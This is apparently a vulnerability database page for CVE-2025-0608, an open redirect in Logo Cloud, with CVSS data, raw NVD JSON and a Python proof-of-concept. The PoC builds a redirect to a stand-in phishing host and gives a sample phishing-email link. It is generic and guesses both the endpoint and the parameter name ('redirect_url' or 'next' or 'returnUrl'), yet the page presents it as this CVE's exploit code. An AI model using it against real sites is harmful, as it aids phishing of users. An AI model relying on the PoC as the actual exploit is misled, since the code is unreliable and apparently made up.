Security Vulnerability Report
中文
CVE-2025-0608 CVSS 5.5 MEDIUM

CVE-2025-0608

Published: 2025-10-06 10:15:34
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Logo Software Inc. Logo Cloud allows Phishing, Forceful Browsing.This issue affects Logo Cloud: before 2025.R6.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Logo Cloud < 2025.R6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0608 Logo Cloud Open Redirect PoC # This PoC demonstrates the open redirect vulnerability in Logo Cloud import requests # Target Logo Cloud endpoint with redirect parameter target_url = "https://[target-logo-cloud-domain]/redirect" # Replace with actual endpoint # Malicious destination URL controlled by attacker malicious_redirect = "https://evil-phishing-site.com/fake-login" # Construct the exploit URL # The vulnerable parameter 'redirect_url' or 'next' or 'returnUrl' is not validated payload_url = f"{target_url}?redirect_url={malicious_redirect}" print(f"[*] Crafted malicious URL: {payload_url}") # Send the request and check for redirect response = requests.get(payload_url, allow_redirects=False) # Check if the server returns a 3xx redirect to the malicious site if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if 'evil-phishing-site.com' in location: print("[+] Vulnerability confirmed! Open redirect to untrusted site detected.") print(f"[+] Server redirected to: {location}") else: print("[-] Redirect detected but target is not the malicious site.") else: print(f"[-] No redirect detected. Status code: {response.status_code}") # Example URL that would be sent to victim in phishing email: # https://[target-logo-cloud-domain]/redirect?redirect_url=https://evil-phishing-site.com/fake-login # When victim clicks, they are redirected to the attacker's phishing page

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0608", "sourceIdentifier": "[email protected]", "published": "2025-10-06T10:15:33.653", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Logo Software Inc. Logo Cloud allows Phishing, Forceful Browsing.This issue affects Logo Cloud: before 2025.R6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0318", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.